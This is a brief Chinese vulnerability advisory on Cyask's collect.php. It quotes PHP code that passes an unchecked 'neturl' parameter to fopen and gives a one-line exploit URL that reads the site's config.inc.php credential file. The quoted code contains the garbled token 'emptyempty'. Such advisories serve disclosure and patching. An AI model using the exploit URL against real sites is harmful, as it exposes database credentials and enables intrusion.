cyask知道系统collect.php页面存在越权漏洞


    影响版本:
    Cyask
    程序介绍:
    Cyask国内较为多人使用的仿百度风格的Ask系统。
    漏洞分析:
    从Collect.php代码当中可以看到
    else  
    {    
    /*  
    检查网址  
    */  
    $url=get_referer();    
    $neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);    
      
    $collect_url=emptyempty($neturl) ? $url : $neturl;    
      
    $contents = ”;    
    if($fid=@fopen($collect_url,”r“))    
    {    
    do  
    {    
    $data = fread($fid, 4096);    
    if (strlen($data) == 0)    
    {    
    break;    
    }    
    $contents .= $data;    
    }    
    while(true);    
    fclose($fid);    
    }    
    else  
    {    
    show_message(’collect_url_error’, ”);    
    exit;    
    }    
    漏洞利用:
    http://www.target.com/collect.php?neturl=config.inc.php
    解决方案:
    厂商补丁:
    cyask
    -------
    目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载